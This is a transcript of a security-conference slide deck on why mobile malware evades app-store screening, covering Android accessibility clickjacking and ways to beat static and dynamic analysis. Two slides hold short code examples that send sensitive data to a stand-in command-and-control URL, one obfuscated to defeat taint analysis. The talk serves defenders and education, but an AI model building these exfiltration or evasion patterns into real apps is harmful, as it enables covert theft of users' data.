Presentation is loading. Please wait.

Presentation is loading. Please wait.

The Ultimate Reason Why Hackers Are Winning The Mobile Malware Battle Yair Amit CTO & Co-Founder Skycure.

Published byMolly Booth Modified over 8 years ago

Similar presentations

Presentation on theme: "The Ultimate Reason Why Hackers Are Winning The Mobile Malware Battle Yair Amit CTO & Co-Founder Skycure."— Presentation transcript:

1 The Ultimate Reason Why Hackers Are Winning The Mobile Malware Battle Yair Amit CTO & Co-Founder Skycure

2 Meet The Speaker Yair Amit CTO, Co- Founder Skycure 20+ Patents IDF 8200

3 Agenda Evolution of mobile malware Accessibility Clickjacking: circumventing app sandboxing Evading current malware detection techniques Recommendations & summary

4 MOBILE MALWARE EVOLUTION

5 Malware Evolution

6 Mobile Malware Evolution Motivation: –What you do, where you go, what you say, 24/7 Challenges of mobile malware attackers: –Apple's App-Store and Google Play screening processGoogle Play –Acquiring privileges requires unnatural end-user flows

7 XcodeGhost Compiler Malware: –Malicious development environment –Legitimate apps packed with malicious code –Malware version enters AppStore with developers’ credentials

8 YiSpecter Jailbroken and non-jailbroken devices Distribution: –Out of AppStore –Aggressive Apple’s private APIs

9 Evolution of Android Malware 20112016 Google Play is riddled with malware 3rd party stores are riddled with malware Google introduces technologies such as “Bouncer” and “Verify Apps”

10 CIRCUMVENTING APP SANDBOXING (WITHOUT RELYING ON ROOTING) Android

11 App Sandboxing 11 Source: developer.apple.com

12 Security Implications of Accessibility Features Accessibility frameworks are traditionally good candidates: –2007 – Windows Vista speech recognition exploitWindows Vista speech recognition exploit –2013 – Siri allows to bypass iPhone lock screenSiri allows to bypass iPhone lock screen –2014 – Siri Lets Anyone Bypass Your iPhone's Lockscreen -- Feature or Bug?Siri Lets Anyone Bypass Your iPhone's Lockscreen -- Feature or Bug? –2015 – iOS 9 allows access to photos and contacts on a passcode locked iPhoneiOS 9 allows access to photos and contacts on a passcode locked iPhone Android Accessibility Framework ✓ Has full access to content in other apps (e.g. read emails) ✓ Ability to monitor user activity and take actions accordingly 12

13 Would You Fall For This? 13

14 ACCESSIBILITY CLICKJACKING

15 A Few Benign Features Draw Over Apps –Can be presented on top of other apps SYSTEM_ALERT_WINDOW –Can be used to pass touch events to underlying apps FLAG_NOT_FOCUSABLE Accessibility APIs 15 Source: Stack Overflow

16 … Can Be Dangerous Together 16 https://youtu.be/4cSRq7_Z26s Victims can be tricked to perform actions without their knowledge

17 What About Lollipop? Original technique was believed to extend till KitKat Lollipop introduced an extra protection –Tap propagation was not allowed for the “OK” button. A direct tap is required. That is not enough… 17

18 MALWARE ANALYSIS TECHNIQUES AND WHY THEY FAIL

19 Signature-Based Analysis

20 Dynamic Analysis Automated User Identification techniques: Network activity Debugging Instrumentation Etc.

21 Evading Dynamic Analysis Make sure the malicious code is not executed during the analysis Examples: –Time bombs Location bombs, IP bombs, etc. –Action-based bombs –Sandbox detection Is the contact list full and “real”? –Same for meetings, emails, accounts, etc. Am I running in a VM? –Victim detection Targeted attacks

22 Static Analysis : The Automated Code Auditor Static analysis unpacks the app and analyses its code & resources

23 Static Analysis : Taint Analysis //... String deviceName = getDeviceName(); //... "&senesitiveData=" + data; //... String data = getSensitiveData (); String data2 = ……………………………………………………… + data; PostRequest("http://www.remote.cnc/data.php", data2);http://www.remote.cnc/data.php String data = getSensitiveData (); String data2 = "DeviceName=" + deviceName + PostRequest("http://www.remote.cnc/data.php", data2);http://www.remote.cnc/data.php Source – a method returning sensitive data Sink - a method leaking out data Sink - a method leaking out data

24 Taint Analysis : Trade-Off Challenge Sources: Sinks:

25 Evading Static Analysis String data = getSensitiveData(); String data2 = ""; for (int i=0; i<data.length(); i++) { if (data.charAt(i) == 'a') data2 += 'a'; if (data.charAt(i) == 'b') data2 += 'b';... } PostRequest("http://www.remote.cnc/data.php", data2);http://www.remote.cnc/data.php", data2); Exploiting the Static Analysis FP/FN tradeoff –Arrays, files, etc.

26 Evading Static Analysis Exploiting the Static Analysis FP/FN tradeoff –Arrays, files, etc. Dynamic code –Reflection –Remote server Malicious code is never made available by a pure static analyzer –Dynamically load an APK from the server –Hybrid apps - HTML & JavaScript (also applicable for iOS)

27 Get code to execute Naïve code returned How to detect malicious behavior, if it does not happen? Analyzer Malicious code

28 App Repackaging DecodePatchRebuildSign Patched app loads code from remote server

29 LIVE DEMO

30 Get code to execute Naïve code returned What about the CNC Server? Can it be blacklisted? Analyzer Malicious code

31 So What Can Defenders Do? Change the paradigm: –Analyzing an app by itself is clearly not enough –Model other elements in the attack flow –Utilize analysis of similar apps on other devices Crowd-wisdom intelligence: –Compare app traits to all millions of apps that have been seen before –Identify anomalies –Track new legitimate and malicious apps without relying only on classic analysis approaches

32 Recommendations If possible, download apps only from official stores Educate employees on the threats, as you would for other forms of computer-security threats –Review the permissions requested by each app before installation Upgrade your device OS to the latest version Install a Mobile Threat Defense solution 32

33 AN ANECDOTE ABOUT ANOTHER FAMILY OF THREATS…

34 Known iOS Vulnerabilities Apr. 15’ Est. Source: Skycure analysis based of CVEdetails.com 374

35 Remember –Malware is only one element of mobile the threat landscape Physical, Network, Malware and Vulnerability threats –On the organizational level, build a mobile security strategy that addresses the Mobile Threat Landscape 35

36 Q&A And Next Steps contact@skycure.com https://www.skycure.com https://blog.skycure.com https://maps.skycure.com @YairAmit, @SkycureSecurity /Skycure

Download ppt "The Ultimate Reason Why Hackers Are Winning The Mobile Malware Battle Yair Amit CTO & Co-Founder Skycure."

Similar presentations

© 2001 3 Leaf Solutions, LLC. All Rights Reserved What’s New in Everett Microsoft.Net V1.1.

© Leaf Solutions, LLC. All Rights Reserved What’s New in Everett Microsoft.Net V1.1.
Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.

Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Latest Threats Against Mobile Devices Dave Jevans Founder, Chairman and CTO.

Latest Threats Against Mobile Devices Dave Jevans Founder, Chairman and CTO.
Secure web browsers, malicious hardware, and hardware support for binary translation Sam King.

Secure web browsers, malicious hardware, and hardware support for binary translation Sam King.
Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson.

Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
By Ms.A.C.Sumathi AP(SG)/ Dept of CSE SNS College of Engineering, CBE.

By Ms.A.C.Sumathi AP(SG)/ Dept of CSE SNS College of Engineering, CBE.
IOS & Android Security, Hacking and Tweaking Workshop D.Papamartzivanos University Of the Aegean – Info Sec Lab Android Security – Cydia Substrate Dimitris.

IOS & Android Security, Hacking and Tweaking Workshop D.Papamartzivanos University Of the Aegean – Info Sec Lab Android Security – Cydia Substrate Dimitris.
CS 153 Design of Operating Systems Spring 2015 Lecture 24: Android OS.

CS 153 Design of Operating Systems Spring 2015 Lecture 24: Android OS.
Norman SecureSurf Protect your users when surfing the Internet.

Norman SecureSurf Protect your users when surfing the Internet.
Presentation By Deepak Katta

Presentation By Deepak Katta
Introduction to Mobile Malware

Introduction to Mobile Malware
VMM Based Rootkit Detection on Android Class Presentation Pete Bohman, Adam Kunk, Erik Shaw.

VMM Based Rootkit Detection on Android Class Presentation Pete Bohman, Adam Kunk, Erik Shaw.
DroidKungFu and AnserverBot

DroidKungFu and AnserverBot
Introduction to Android Swapnil Pathak www.SecurityXploded.com Advanced Malware Analysis Training Series.

Introduction to Android Swapnil Pathak Advanced Malware Analysis Training Series.
A Comprehensive Guide to Mobile Targeted Attacks (and What Can You Do About It) Ohad Bobrov, CTO twitter.com/LacoonSecurity.

A Comprehensive Guide to Mobile Targeted Attacks (and What Can You Do About It) Ohad Bobrov, CTO twitter.com/LacoonSecurity.
All Your Droid Are Belong To Us: A Survey of Current Android Attacks 단국대학교 컴퓨터 보안 및 OS 연구실 김낙영 2015. 04. 21.

All Your Droid Are Belong To Us: A Survey of Current Android Attacks 단국대학교 컴퓨터 보안 및 OS 연구실 김낙영
Is Your Mobile App Secure. DEF CON 23 Wall of Sheep Sat

Is Your Mobile App Secure. DEF CON 23 Wall of Sheep Sat

Similar presentations

Ads by Google